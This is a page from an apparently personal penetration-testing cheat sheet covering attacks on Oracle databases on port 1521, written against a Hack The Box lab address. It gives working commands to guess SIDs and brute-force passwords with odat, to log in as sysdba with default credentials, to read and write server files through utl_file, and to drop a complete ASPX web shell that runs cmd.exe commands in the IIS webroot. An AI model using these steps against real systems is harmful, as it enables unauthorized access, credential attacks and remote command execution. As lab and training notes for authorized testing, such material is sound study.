Pentest
TryhackmeHackthebox
  • 🐧Linux
    • Lateral Movement
    • PrivilageEsc Linux 👑
  • 🪟Windows
    • Lateral Movement
    • PrivilageEsc Windows 👑
    • Active Directory / SMB
  • ☁️Cloud
    • AWS
    • Docker
    • Azure AD
    • Kubernetes
  • 🛠️Tools
    • File Transfers
    • Shells / Payloads
    • Pivoting / Forwarding
    • Network Enumeration
    • Cracking / Fuzzing / Brute-force
  • 🚐TCP
    • 21 ) FTP
    • 22 ) SSH
    • 25 ) SMTP
    • 53 ) DNS
    • 79 ) Finger
    • 110 ) POP3
    • 143, 993 ) IMAP
    • 389 ) LDAP
    • 443 ) HTTPS
    • 2049 /111 ) NFS /RPC
    • 3128 ) Squid Proxy
    • 3690 ) Subversion
    • 6379 ) Redis
    • 9200 ) Elasticsearch
    • 11211 ) Memcached
    • 24007 & 49152) Gluster
  • 🚎UDP
    • 69 ) TFTP
    • 161 ) SNMP
    • 500, 4500 ) IPsec IKE
    • 623) IPMI
  • 🔟OWASP 10
    • SQLi
    • NoSQLi
    • LFI / XXE
    • Command Injection
    • XSS / HTMLi / (S/C)SRF / SSTI
  • 📚Database
    • Oracle SQL | 1521
    • MSSQL / MYSQL / PSQL
  • 🔗Binary Exploitation
    • Linux
    • Windows
  • 👨‍🚒Red team
    • Reconnaissance
    • Initial Access
    • Persistence Techniques
    • AV Evasion Techniques
  • 🐰Bug Bounty
    • Search Engine
    • Index.html
  • ⌚Links
    • Passwords 1
    • Default Passwords
    • Default passwords 2
  • 🔄Other
    • Git
    • HackerGPT
    • Curl
    • Hints!!
    • Log4j
    • Mobile Sec
    • BookMarks
    • Steganography
    • CMS / Servers / Others
    • Deserialization
    • Tryhackme
  • 🤖Mobile Android Pentest
    • Mobile Sec
    • Drozer
  • Group 1
    • 📦HackTheBox — Writeups
      • 🏴‍☠️HTB - Devvortex
Powered by GitBook
On this page
  1. Database

Oracle SQL | 1521

  • Scan SIDs

odat sidguesser -s 10.10.10.82
  • Brute force Passwords

odat passwordguesser -s 10.10.10.82 -d XE --accounts-file /usr/share/odat/accounts/accounts.txt
  • Login to SQPLUS Database

## ------------------| Setup
sudo apt-get install oracle-instantclient-sqlplus
which sqlplus
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$ORACLE_HOME/lib
export PATH=$ORACLE_HOME/bin:$PATH

## ------------------| Login as user
sqlplus <USERNAME>/'<PASSWORD>'@<IP>:1521/XE

## ------------------| Login as superuser
sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba
  • SQLPLUSS Quarries

select * from session_privs;
select * from user_role_privs;
  • Read File

set serveroutput ON

declare
   f utl_file.file_type;
   s varchar(5000);
begin
   f := utl_file.fopen('/inetpub/wwwroot','iisstart.htm','R');
   utl_file.get_line(f,s);
   utl_file.fclose(f);
   dbms_output.put_line(s);
end;

# Hit enter then type '/' and  hit enter
  • Write File

declare
   f utl_file.file_type;
   s varchar(5000) := 'h4rithd was there';
begin
   f := utl_file.fopen('/inetpub/wwwroot','h4rith.txt','W');
   utl_file.put_line(f,s);
   utl_file.fclose(f);
end;

# Hit enter then type '/' and  hit enter
  • Write bind shell. (aspx)

declare
   f utl_file.file_type;
   s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
   f := utl_file.fopen('/inetpub/wwwroot','h4rithd.aspx','W');
   utl_file.put_line(f,s);
   utl_file.fclose(f);
end;

# Hit enter then type '/' and  hit enter
PreviousDatabaseNextMSSQL / MYSQL / PSQL

Last updated 2 years ago

📚